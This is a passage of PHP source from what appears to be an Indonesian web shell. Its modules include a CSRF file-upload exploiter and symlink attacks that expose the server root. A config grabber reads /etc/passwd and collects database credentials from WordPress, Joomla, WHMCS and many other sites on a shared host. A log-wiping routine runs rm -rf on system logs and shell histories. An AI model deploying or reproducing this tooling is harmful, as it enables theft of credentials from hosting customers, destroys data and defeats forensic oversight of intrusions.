  810. echo "[<font color=yellow>SendMail</font>] <font color=#2196F3>".$shc."</font> { ".$shcmail." }<br>";
  811. }
  812. }
  813. }
  814.  
  815. }else{
  816. tampilkan($shc);
  817. }
  818. }
  819. }
  820. }
  821. tampilkan($_POST['shc_dir']);
  822. }
  823. echo "</pre>\n";
  824. echo "</Center>\n";}
  825. elseif($_GET['do'] == 'csrf') {
  826. echo "<h1>CSRF Exploiter Online</h1>
  827. <form method='post'>
  828. URL: &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='url' size='50' height='10' placeholder='http://127.0.0.1/[path]/upload.php' style='margin: 5px auto; padding-left: 5px;' required><br>
  829. POST File: <input type='text' name='data' style='border:0;border-bottom:1px solid #292929; width:500px;' size='50' height='10' placeholder='Filedata / files[] / qqfile / userfile / dll' style='margin: 5px auto; padding-left: 5px;' required><br>
  830. <br><input style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' class='kotak' type='submit' name='go' value='Lock!'>
  831. </form>";
  832. $url = $_POST['url'];
  833. $data = $_POST['data'];
  834. $submit = $_POST['go'];
  835. if($submit) {
  836. echo "<br><form style='text-align:left' method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$data'><input style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' type='submit' name='ok' class='kotak' value='Upload'>
  837. </form></div>";
  838. }
  839. ;} elseif($_GET['do'] == 'symlink') {
  840. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  841. $d0mains = @file("/etc/named.conf");
  842. ##httaces
  843. if($d0mains){
  844. @mkdir("ManaKuTau_sym",0777);
  845. @chdir("ManaKuTau_sym");
  846. @exe("ln -s / root");
  847. $file3 = 'Options Indexes FollowSymLinks
  848. DirectoryIndex berandal.htm
  849. AddType text/plain .php
  850. AddHandler text/plain .php
  851. Satisfy Any';
  852. $fp3 = fopen('.htaccess','w');
  853. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  854. echo "<center><h2>Symlink Server</h2></center>
  855. <table align=center border=1 style='width:60%;border-color:#333333;'>
  856. <tr>
  857. <td align=center><font size=2>No.</font></td>
  858. <td align=center><font size=2>Domains</font></td>
  859. <td align=center><font size=2>Users</font></td>
  860. <td align=center><font size=2>Symlink</font></td>
  861. </tr>";
  862. $dcount = 1;
  863. foreach($d0mains as $d0main){
  864. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  865. flush();
  866. if(strlen(trim($domains[1][0])) > 2){
  867. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  868. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  869. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  870. <td>".$user['name']."</td>
  871. <td><a href='$full/ManaKuTau_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  872. flush();
  873. $dcount++;}}}
  874. echo "</table>";
  875. }else{
  876. $TEST=@file('/etc/passwd');
  877. if ($TEST){
  878. @mkdir("ManaKuTau_sym",0777);
  879. @chdir("ManaKuTau_sym");
  880. exe("ln -s / root");
  881. $file3 = 'Options Indexes FollowSymLinks
  882. DirectoryIndex berandal.htm
  883. AddType text/plain .php
  884. AddHandler text/plain .php
  885. Satisfy Any';
  886. $fp3 = fopen('.htaccess','w');
  887. $fw3 = fwrite($fp3,$file3);
  888. @fclose($fp3);
  889. echo "
  890. <table align=center border=1><tr>
  891. <td align=center><font size=3>S. No.</font></td>
  892. <td align=center><font size=3>Users</font></td>
  893. <td align=center><font size=3>Symlink</font></td></tr>";
  894. $dcount = 1;
  895. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  896. while(!feof($file)){
  897. $s = fgets($file);
  898. $matches = array();
  899. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  900. $matches = str_replace("home/","",$matches[1]);
  901. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  902. continue;
  903. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  904. <td align=center><font class=txt>" . $matches . "</td>";
  905. echo "<td align=center><font class=txt><a href=$full/berandal_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  906. $dcount++;}fclose($file);
  907. echo "</table>";}else{if($os != "Windows"){@mkdir("berandal_sym",0777);@chdir("ManaKuTau_sym");@exe("ln -s / root");$file3 = '
  908. Options Indexes FollowSymLinks
  909. DirectoryIndex 69.htm
  910. AddType text/plain .php
  911. AddHandler text/plain .php
  912. Satisfy Any
  913. ';
  914. $fp3 = fopen('.htaccess','w');
  915. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  916. echo "
  917. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  918. <table align=center border=1><tr>
  919. <td align=center><font size=3>ID</font></td>
  920. <td align=center><font size=3>Users</font></td>
  921. <td align=center><font size=3>Symlink</font></td></tr>";
  922. $temp = "";$val1 = 0;$val2 = 1000;
  923. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  924. if ($uid)$temp .= join(':',$uid)."\n";}
  925. echo '<br/>';$temp = trim($temp);$file5 =
  926. fopen("test.txt","w");
  927. fputs($file5,$temp);
  928. fclose($file5);$dcount = 1;$file =
  929. fopen("test.txt", "r") or exit("Unable to open file!");
  930. while(!feof($file)){$s = fgets($file);$matches = array();
  931. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  932. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  933. continue;
  934. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  935. <td align=center><font class=txt>" . $matches . "</td>";
  936. echo "<td align=center><font class=txt><a href=$full/ManaKuTau_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  937. $dcount++;}
  938. fclose($file);
  939. echo "</table></div></center>";unlink("test.txt");
  940. } else
  941. echo "<center><font size=3>Cannot create Symlink</font></center>";
  942. }
  943. }
  944. } elseif($_GET['config'] == 'grabber') {
  945. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  946. echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
  947. exit;
  948. }
  949. if($_POST){ if($_POST['config'] == 'symvhosts') {
  950. @mkdir("ManaKuTau_symvhosts", 0777);
  951. exe("ln -s / ManaKuTau_symvhosts/root");
  952. $htaccess="Options Indexes FollowSymLinks
  953. DirectoryIndex 69.htm
  954. AddType text/plain .php
  955. AddHandler text/plain .php
  956. Satisfy Any";
  957. @file_put_contents("ManaKuTau_symvhosts/.htaccess",$htaccess);
  958. $etc_passwd=$_POST['passwd'];
  959.  
  960. $etc_passwd=explode("\n",$etc_passwd);
  961. foreach($etc_passwd as $passwd){
  962. $pawd=explode(":",$passwd);
  963. $user =$pawd[5];
  964. $jembod = preg_replace('/\/var\/www\/vhosts\//', '', $user);
  965. if (preg_match('/vhosts/i',$user)){
  966. exe("ln -s ".$user."/httpdocs/wp-config.php berandal_symvhosts/".$jembod."-Wordpress.txt");
  967. exe("ln -s ".$user."/httpdocs/configuration.php berandal_symvhosts/".$jembod."-Joomla.txt");
  968. exe("ln -s ".$user."/httpdocs/config/koneksi.php berandal_symvhosts/".$jembod."-Lokomedia.txt");
  969. exe("ln -s ".$user."/httpdocs/forum/config.php berandal_symvhosts/".$jembod."-phpBB.txt");
  970. exe("ln -s ".$user."/httpdocs/sites/default/settings.php berandal_symvhosts/".$jembod."-Drupal.txt");
  971. exe("ln -s ".$user."/httpdocs/config/settings.inc.php berandal_symvhosts/".$jembod."-PrestaShop.txt");
  972. exe("ln -s ".$user."/httpdocs/app/etc/local.xml berandal_symvhosts/".$jembod."-Magento.txt");
  973. exe("ln -s ".$user."/httpdocs/admin/config.php berandal_symvhosts/".$jembod."-OpenCart.txt");
  974. exe("ln -s ".$user."/httpdocs/application/config/database.php berandal_symvhosts/".$jembod."-Ellislab.txt");
  975. }}}
  976. if($_POST['config'] == 'symlink') {
  977. @mkdir("ManaKuTau_symconfig", 0777);
  978. @symlink("/","berandal_symconfig/root");
  979. $htaccess="Options Indexes FollowSymLinks
  980. DirectoryIndex 69.htm
  981. AddType text/plain .php
  982. AddHandler text/plain .php
  983. Satisfy Any";
  984. @file_put_contents("ManaKuTau_symconfig/.htaccess",$htaccess);}
  985. if($_POST['config'] == '404') {
  986. @mkdir("ManaKuTau_sym404", 0777);
  987. @symlink("/","ManaKuTau_sym404/root");
  988. $htaccess="Options Indexes FollowSymLinks
  989. DirectoryIndex 69.htm
  990. AddType text/plain .php
  991. AddHandler text/plain .php
  992. Satisfy Any
  993. IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
  994. IndexIgnore *.txt404
  995. RewriteEngine On
  996. RewriteCond %{REQUEST_FILENAME} ^.*berandal_sym404 [NC]
  997. RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]";
  998. @file_put_contents("ManaKuTau_sym404/.htaccess",$htaccess);
  999. }
  1000. if($_POST['config'] == 'grab') {
  1001. mkdir("ManaKuTau_config", 0777);
  1002. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  1003. $htc = fopen("berandal_config/.htaccess","w");
  1004. fwrite($htc, $isi_htc);
  1005. }
  1006. $passwd = $_POST['passwd'];
  1007.  
  1008. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1009. foreach($user_config[1] as $user_berandal) {
  1010. $grab_config = array(
  1011. "/home/$user_berandal/.accesshash" => "WHM-accesshash",
  1012. "/home/$user_berandal/public_html/config/koneksi.php" => "Lokomedia",
  1013. "/home/$user_berandal/public_html/forum/config.php" => "phpBB",
  1014. "/home/$user_berandal/public_html/sites/default/settings.php" => "Drupal",
  1015. "/home/$user_berandal/public_html/config/settings.inc.php" => "PrestaShop",
  1016. "/home/$user_berandal/public_html/app/etc/local.xml" => "Magento",
  1017. "/home/$user_berandal/public_html/admin/config.php" => "OpenCart",
  1018. "/home/$user_berandal/public_html/application/config/database.php" => "Ellislab",
  1019. "/home/$user_berandal/public_html/vb/includes/config.php" => "Vbulletin",
  1020. "/home/$user_berandal/public_html/includes/config.php" => "Vbulletin",
  1021. "/home/$user_berandal/public_html/forum/includes/config.php" => "Vbulletin",
  1022. "/home/$user_berandal/public_html/forums/includes/config.php" => "Vbulletin",
  1023. "/home/$user_berandal/public_html/cc/includes/config.php" => "Vbulletin",
  1024. "/home/$user_berandal/public_html/inc/config.php" => "MyBB",
  1025. "/home/$user_berandal/public_html/includes/configure.php" => "OsCommerce",
  1026. "/home/$user_berandal/public_html/shop/includes/configure.php" => "OsCommerce",
  1027. "/home/$user_berandal/public_html/os/includes/configure.php" => "OsCommerce",
  1028. "/home/$user_berandal/public_html/oscom/includes/configure.php" => "OsCommerce",
  1029. "/home/$user_berandal/public_html/products/includes/configure.php" => "OsCommerce",
  1030. "/home/$user_berandal/public_html/cart/includes/configure.php" => "OsCommerce",
  1031. "/home/$user_berandal/public_html/inc/conf_global.php" => "IPB",
  1032. "/home/$user_berandal/public_html/wp-config.php" => "Wordpress",
  1033. "/home/$user_berandal/public_html/wp/test/wp-config.php" => "Wordpress",
  1034. "/home/$user_berandal/public_html/blog/wp-config.php" => "Wordpress",
  1035. "/home/$user_berandal/public_html/beta/wp-config.php" => "Wordpress",
  1036. "/home/$user_berandal/public_html/portal/wp-config.php" => "Wordpress",
  1037. "/home/$user_berandal/public_html/site/wp-config.php" => "Wordpress",
  1038. "/home/$user_berandal/public_html/wp/wp-config.php" => "Wordpress",
  1039. "/home/$user_berandal/public_html/WP/wp-config.php" => "Wordpress",
  1040. "/home/$user_berandal/public_html/news/wp-config.php" => "Wordpress",
  1041. "/home/$user_berandal/public_html/wordpress/wp-config.php" => "Wordpress",
  1042. "/home/$user_berandal/public_html/test/wp-config.php" => "Wordpress",
  1043. "/home/$user_berandal/public_html/demo/wp-config.php" => "Wordpress",
  1044. "/home/$user_berandal/public_html/home/wp-config.php" => "Wordpress",
  1045. "/home/$user_berandal/public_html/v1/wp-config.php" => "Wordpress",
  1046. "/home/$user_berandal/public_html/v2/wp-config.php" => "Wordpress",
  1047. "/home/$user_berandal/public_html/press/wp-config.php" => "Wordpress",
  1048. "/home/$user_berandal/public_html/new/wp-config.php" => "Wordpress",
  1049. "/home/$user_berandal/public_html/blogs/wp-config.php" => "Wordpress",
  1050. "/home/$user_berandal/public_html/configuration.php" => "Joomla",
  1051. "/home/$user_berandal/public_html/blog/configuration.php" => "Joomla",
  1052. "/home/$user_berandal/public_html/submitticket.php" => "^WHMCS",
  1053. "/home/$user_berandal/public_html/cms/configuration.php" => "Joomla",
  1054. "/home/$user_berandal/public_html/beta/configuration.php" => "Joomla",
  1055. "/home/$user_berandal/public_html/portal/configuration.php" => "Joomla",
  1056. "/home/$user_berandal/public_html/site/configuration.php" => "Joomla",
  1057. "/home/$user_berandal/public_html/main/configuration.php" => "Joomla",
  1058. "/home/$user_berandal/public_html/home/configuration.php" => "Joomla",
  1059. "/home/$user_berandal/public_html/demo/configuration.php" => "Joomla",
  1060. "/home/$user_berandal/public_html/test/configuration.php" => "Joomla",
  1061. "/home/$user_berandal/public_html/v1/configuration.php" => "Joomla",
  1062. "/home/$user_berandal/public_html/v2/configuration.php" => "Joomla",
  1063. "/home/$user_berandal/public_html/joomla/configuration.php" => "Joomla",
  1064. "/home/$user_berandal/public_html/new/configuration.php" => "Joomla",
  1065. "/home/$user_berandal/public_html/WHMCS/submitticket.php" => "WHMCS",
  1066. "/home/$user_berandal/public_html/whmcs1/submitticket.php" => "WHMCS",
  1067. "/home/$user_berandal/public_html/Whmcs/submitticket.php" => "WHMCS",
  1068. "/home/$user_berandal/public_html/whmcs/submitticket.php" => "WHMCS",
  1069. "/home/$user_berandal/public_html/whmcs/submitticket.php" => "WHMCS",
  1070. "/home/$user_berandal/public_html/WHMC/submitticket.php" => "WHMCS",
  1071. "/home/$user_berandal/public_html/Whmc/submitticket.php" => "WHMCS",
  1072. "/home/$user_berandal/public_html/whmc/submitticket.php" => "WHMCS",
  1073. "/home/$user_berandal/public_html/WHM/submitticket.php" => "WHMCS",
  1074. "/home/$user_berandal/public_html/Whm/submitticket.php" => "WHMCS",
  1075. "/home/$user_berandal/public_html/whm/submitticket.php" => "WHMCS",
  1076. "/home/$user_berandal/public_html/HOST/submitticket.php" => "WHMCS",
  1077. "/home/$user_berandal/public_html/Host/submitticket.php" => "WHMCS",
  1078. "/home/$user_berandal/public_html/host/submitticket.php" => "WHMCS",
  1079. "/home/$user_berandal/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  1080. "/home/$user_berandal/public_html/Supportes/submitticket.php" => "WHMCS",
  1081. "/home/$user_berandal/public_html/supportes/submitticket.php" => "WHMCS",
  1082. "/home/$user_berandal/public_html/domains/submitticket.php" => "WHMCS",
  1083. "/home/$user_berandal/public_html/domain/submitticket.php" => "WHMCS",
  1084. "/home/$user_berandal/public_html/Hosting/submitticket.php" => "WHMCS",
  1085. "/home/$user_berandal/public_html/HOSTING/submitticket.php" => "WHMCS",
  1086. "/home/$user_berandal/public_html/hosting/submitticket.php" => "WHMCS",
  1087. "/home/$user_berandal/public_html/CART/submitticket.php" => "WHMCS",
  1088. "/home/$user_berandal/public_html/Cart/submitticket.php" => "WHMCS",
  1089. "/home/$user_berandal/public_html/cart/submitticket.php" => "WHMCS",
  1090. "/home/$user_berandal/public_html/ORDER/submitticket.php" => "WHMCS",
  1091. "/home/$user_berandal/public_html/Order/submitticket.php" => "WHMCS",
  1092. "/home/$user_berandal/public_html/order/submitticket.php" => "WHMCS",
  1093. "/home/$user_berandal/public_html/CLIENT/submitticket.php" => "WHMCS",
  1094. "/home/$user_berandal/public_html/Client/submitticket.php" => "WHMCS",
  1095. "/home/$user_berandal/public_html/client/submitticket.php" => "WHMCS",
  1096. "/home/$user_berandal/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  1097. "/home/$user_berandal/public_html/Clientarea/submitticket.php" => "WHMCS",
  1098. "/home/$user_berandal/public_html/clientarea/submitticket.php" => "WHMCS",
  1099. "/home/$user_berandal/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1100. "/home/$user_berandal/public_html/Support/submitticket.php" => "WHMCS",
  1101. "/home/$user_berandal/public_html/support/submitticket.php" => "WHMCS",
  1102. "/home/$user_berandal/public_html/BILLING/submitticket.php" => "WHMCS",
  1103. "/home/$user_berandal/public_html/Billing/submitticket.php" => "WHMCS",
  1104. "/home/$user_berandal/public_html/billing/submitticket.php" => "WHMCS",
  1105. "/home/$user_berandal/public_html/BUY/submitticket.php" => "WHMCS",
  1106. "/home/$user_berandal/public_html/Buy/submitticket.php" => "WHMCS",
  1107. "/home/$user_berandal/public_html/buy/submitticket.php" => "WHMCS",
  1108. "/home/$user_berandal/public_html/MANAGE/submitticket.php" => "WHMCS",
  1109. "/home/$user_berandal/public_html/Manage/submitticket.php" => "WHMCS",
  1110. "/home/$user_berandal/public_html/manage/submitticket.php" => "WHMCS",
  1111. "/home/$user_berandal/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1112. "/home/$user_berandal/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1113. "/home/$user_berandal/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1114. "/home/$user_berandal/public_html/clientsupport/submitticket.php" => "WHMCS",
  1115. "/home/$user_berandal/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1116. "/home/$user_berandal/public_html/Checkout/submitticket.php" => "WHMCS",
  1117. "/home/$user_berandal/public_html/checkout/submitticket.php" => "WHMCS",
  1118. "/home/$user_berandal/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1119. "/home/$user_berandal/public_html/Billings/submitticket.php" => "WHMCS",
  1120. "/home/$user_berandal/public_html/billings/submitticket.php" => "WHMCS",
  1121. "/home/$user_berandal/public_html/BASKET/submitticket.php" => "WHMCS",
  1122. "/home/$user_berandal/public_html/Basket/submitticket.php" => "WHMCS",
  1123. "/home/$user_berandal/public_html/basket/submitticket.php" => "WHMCS",
  1124. "/home/$user_berandal/public_html/SECURE/submitticket.php" => "WHMCS",
  1125. "/home/$user_berandal/public_html/Secure/submitticket.php" => "WHMCS",
  1126. "/home/$user_berandal/public_html/secure/submitticket.php" => "WHMCS",
  1127. "/home/$user_berandal/public_html/SALES/submitticket.php" => "WHMCS",
  1128. "/home/$user_berandal/public_html/Sales/submitticket.php" => "WHMCS",
  1129. "/home/$user_berandal/public_html/sales/submitticket.php" => "WHMCS",
  1130. "/home/$user_berandal/public_html/BILL/submitticket.php" => "WHMCS",
  1131. "/home/$user_berandal/public_html/Bill/submitticket.php" => "WHMCS",
  1132. "/home/$user_berandal/public_html/bill/submitticket.php" => "WHMCS",
  1133. "/home/$user_berandal/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1134. "/home/$user_berandal/public_html/Purchase/submitticket.php" => "WHMCS",
  1135. "/home/$user_berandal/public_html/purchase/submitticket.php" => "WHMCS",
  1136. "/home/$user_berandal/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1137. "/home/$user_berandal/public_html/Account/submitticket.php" => "WHMCS",
  1138. "/home/$user_berandal/public_html/account/submitticket.php" => "WHMCS",
  1139. "/home/$user_berandal/public_html/USER/submitticket.php" => "WHMCS",
  1140. "/home/$user_berandal/public_html/User/submitticket.php" => "WHMCS",
  1141. "/home/$user_berandal/public_html/user/submitticket.php" => "WHMCS",
  1142. "/home/$user_berandal/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1143. "/home/$user_berandal/public_html/Clients/submitticket.php" => "WHMCS",
  1144. "/home/$user_berandal/public_html/clients/submitticket.php" => "WHMCS",
  1145. "/home/$user_berandal/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1146. "/home/$user_berandal/public_html/Billings/submitticket.php" => "WHMCS",
  1147. "/home/$user_berandal/public_html/billings/submitticket.php" => "WHMCS",
  1148. "/home/$user_berandal/public_html/MY/submitticket.php" => "WHMCS",
  1149. "/home/$user_berandal/public_html/My/submitticket.php" => "WHMCS",
  1150. "/home/$user_berandal/public_html/my/submitticket.php" => "WHMCS",
  1151. "/home/$user_berandal/public_html/secure/whm/submitticket.php" => "WHMCS",
  1152. "/home/$user_berandal/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1153. "/home/$user_berandal/public_html/panel/submitticket.php" => "WHMCS",
  1154. "/home/$user_berandal/public_html/clientes/submitticket.php" => "WHMCS",
  1155. "/home/$user_berandal/public_html/cliente/submitticket.php" => "WHMCS",
  1156. "/home/$user_berandal/public_html/support/order/submitticket.php" => "WHMCS",
  1157. "/home/$user_berandal/public_html/bb-config.php" => "BoxBilling",
  1158. "/home/$user_berandal/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1159. "/home/$user_berandal/public_html/box/bb-config.php" => "BoxBilling",
  1160. "/home/$user_berandal/public_html/host/bb-config.php" => "BoxBilling",
  1161. "/home/$user_berandal/public_html/Host/bb-config.php" => "BoxBilling",
  1162. "/home/$user_berandal/public_html/supportes/bb-config.php" => "BoxBilling",
  1163. "/home/$user_berandal/public_html/support/bb-config.php" => "BoxBilling",
  1164. "/home/$user_berandal/public_html/hosting/bb-config.php" => "BoxBilling",
  1165. "/home/$user_berandal/public_html/cart/bb-config.php" => "BoxBilling",
  1166. "/home/$user_berandal/public_html/order/bb-config.php" => "BoxBilling",
  1167. "/home/$user_berandal/public_html/client/bb-config.php" => "BoxBilling",
  1168. "/home/$user_berandal/public_html/clients/bb-config.php" => "BoxBilling",
  1169. "/home/$user_berandal/public_html/cliente/bb-config.php" => "BoxBilling",
  1170. "/home/$user_berandal/public_html/clientes/bb-config.php" => "BoxBilling",
  1171. "/home/$user_berandal/public_html/billing/bb-config.php" => "BoxBilling",
  1172. "/home/$user_berandal/public_html/billings/bb-config.php" => "BoxBilling",
  1173. "/home/$user_berandal/public_html/my/bb-config.php" => "BoxBilling",
  1174. "/home/$user_berandal/public_html/secure/bb-config.php" => "BoxBilling",
  1175. "/home/$user_berandal/public_html/support/order/bb-config.php" => "BoxBilling",
  1176. "/home/$user_berandal/public_html/includes/dist-configure.php" => "Zencart",
  1177. "/home/$user_berandal/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1178. "/home/$user_berandal/public_html/products/includes/dist-configure.php" => "Zencart",
  1179. "/home/$user_berandal/public_html/cart/includes/dist-configure.php" => "Zencart",
  1180. "/home/$user_berandal/public_html/shop/includes/dist-configure.php" => "Zencart",
  1181. "/home/$user_berandal/public_html/includes/iso4217.php" => "Hostbills",
  1182. "/home/$user_berandal/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1183. "/home/$user_berandal/public_html/host/includes/iso4217.php" => "Hostbills",
  1184. "/home/$user_berandal/public_html/Host/includes/iso4217.php" => "Hostbills",
  1185. "/home/$user_berandal/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1186. "/home/$user_berandal/public_html/support/includes/iso4217.php" => "Hostbills",
  1187. "/home/$user_berandal/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1188. "/home/$user_berandal/public_html/cart/includes/iso4217.php" => "Hostbills",
  1189. "/home/$user_berandal/public_html/order/includes/iso4217.php" => "Hostbills",
  1190. "/home/$user_berandal/public_html/client/includes/iso4217.php" => "Hostbills",
  1191. "/home/$user_berandal/public_html/clients/includes/iso4217.php" => "Hostbills",
  1192. "/home/$user_berandal/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1193. "/home/$user_berandal/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1194. "/home/$user_berandal/public_html/billing/includes/iso4217.php" => "Hostbills",
  1195. "/home/$user_berandal/public_html/billings/includes/iso4217.php" => "Hostbills",
  1196. "/home/$user_berandal/public_html/my/includes/iso4217.php" => "Hostbills",
  1197. "/home/$user_berandal/public_html/secure/includes/iso4217.php" => "Hostbills",
  1198. "/home/$user_berandal/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1199. );
  1200.  
  1201. foreach($grab_config as $config => $nama_config) {
  1202. if($_POST['config'] == 'grab') {
  1203. $ambil_config = file_get_contents($config);
  1204. if($ambil_config == '') {
  1205. } else {
  1206. $file_config = fopen("berandal_config/$user_berandal-$nama_config.txt","w");
  1207. fputs($file_config,$ambil_config);
  1208. }
  1209. }
  1210. if($_POST['config'] == 'symlink') {
  1211. @symlink($config,"berandal_Symconfig/".$user_berandal."-".$nama_config.".txt");
  1212. }
  1213. if($_POST['config'] == '404') {
  1214. $sym404=symlink($config,"berandal_sym404/".$user_berandal."-".$nama_config.".txt");
  1215. if($sym404){
  1216. @mkdir("ManaKuTau_sym404/".$user_berandal."-".$nama_config.".txt404", 0777);
  1217. $htaccess="Options Indexes FollowSymLinks
  1218. DirectoryIndex 69.htm
  1219. HeaderName ManaKuTau.txt
  1220. Satisfy Any
  1221. IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
  1222. IndexIgnore *";
  1223.  
  1224. @file_put_contents("ManaKuTau_sym404/".$user_berandal."-".$nama_config.".txt404/.htaccess",$htaccess);
  1225.  
  1226. @symlink($config,"ManaKuTau_sym404/".$user_ManaKuTau."-".$nama_config.".txt404/ManaKuTau.txt");
  1227.  
  1228. }
  1229.  
  1230. }
  1231.  
  1232. }
  1233. } if($_POST['config'] == 'grab') {
  1234. echo "<center><a href='?dir=$dir/berandal_config'><font color=cyan>Done</font></a></center>";
  1235. }
  1236. if($_POST['config'] == '404') {
  1237. echo "<center>
  1238. <a href=\"ManaKuTau_sym404/root/\">SymlinkNya</a>
  1239. <br><a href=\"berandal_sym404/\">Configurations</a></center>";
  1240. }
  1241. if($_POST['config'] == 'symlink') {
  1242. echo "<center>
  1243. <a href=\"berandal_symconfig/root/\">Symlinknya</a>
  1244. <br><a href=\"berandal_symconfig/\">Configurations</a></center>";
  1245. }if($_POST['config'] == 'symvhost') {
  1246. echo "<center>
  1247. <a href=\"berandal_symvhost/root/\">Root Server</a>
  1248. <br><a href=\"ManaKuTau_symvhost/\">Configurations</a></center>";
  1249. }
  1250.  
  1251.  
  1252. }else{
  1253. echo "<form method=\"post\" action=\"\"><center>
  1254. </center></select><br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1255. echo include("/etc/passwd");
  1256. echo "</textarea><br><br>
  1257. <select class=\"select\" name=\"config\" style=\"width: 450px;\" height=\"10\">
  1258. <option value=\"grab\">Config Grab</option>
  1259. <option value=\"symlink\">Symlink Config</option>
  1260. <option value=\"404\">Config 404</option>
  1261. <option value=\"symvhosts\">Vhosts Config Grabber</option><br><br><input type=\"submit\" value=\"Start!!\"></td></tr></center>\n";
  1262. }
  1263. } elseif($_GET['delete'] == 'logs') {
  1264. echo '<br><center><h2>Delete Logs ( For Safe )</h2><center><br>';
  1265. echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'><br><hr color='white'>";
  1266. exec("rm -rf /tmp/logs");
  1267. exec("rm -rf /root/.ksh_history");
  1268. exec("rm -rf /root/.bash_history");
  1269. exec("rm -rf /root/.bash_logout");
  1270. exec("rm -rf /usr/local/apache/logs");
  1271. exec("rm -rf /usr/local/apache/log");
  1272. exec("rm -rf /var/apache/logs");
  1273. exec("rm -rf /var/apache/log");
  1274. exec("rm -rf /var/run/utmp");
  1275. exec("rm -rf /var/logs");
  1276. exec("rm -rf /var/log");
  1277. exec("rm -rf /var/adm");
  1278. exec("rm -rf /etc/wtmp");
  1279. exec("rm -rf /etc/utmp");
  1280. exec("rm -rf $HISTFILE");
  1281. exec("rm -rf /var/log/lastlog");
  1282. exec("rm -rf /var/log/wtmp");
  1283.  
  1284. shell_exec("rm -rf /tmp/logs");
  1285. shell_exec("rm -rf /root/.ksh_history");
  1286. shell_exec("rm -rf /root/.bash_history");
  1287. shell_exec("rm -rf /root/.bash_logout");
  1288. shell_exec("rm -rf /usr/local/apache/logs");
  1289. shell_exec("rm -rf /usr/local/apache/log");
  1290. shell_exec("rm -rf /var/apache/logs");
  1291. shell_exec("rm -rf /var/apache/log");
  1292. shell_exec("rm -rf /var/run/utmp");
  1293. shell_exec("rm -rf /var/logs");
  1294. shell_exec("rm -rf /var/log");
  1295. shell_exec("rm -rf /var/adm");
  1296. shell_exec("rm -rf /etc/wtmp");
  1297. shell_exec("rm -rf /etc/utmp");
  1298. shell_exec("rm -rf $HISTFILE");
  1299. shell_exec("rm -rf /var/log/lastlog");
  1300. shell_exec("rm -rf /var/log/wtmp");
  1301.  
  1302. passthru("rm -rf /tmp/logs");
  1303. passthru("rm -rf /root/.ksh_history");
  1304. passthru("rm -rf /root/.bash_history");
  1305. passthru("rm -rf /root/.bash_logout");
  1306. passthru("rm -rf /usr/local/apache/logs");
  1307. passthru("rm -rf /usr/local/apache/log");
  1308. passthru("rm -rf /var/apache/logs");
  1309. passthru("rm -rf /var/apache/log");
  1310. passthru("rm -rf /var/run/utmp");
  1311. passthru("rm -rf /var/logs");
  1312. passthru("rm -rf /var/log");
  1313. passthru("rm -rf /var/adm");
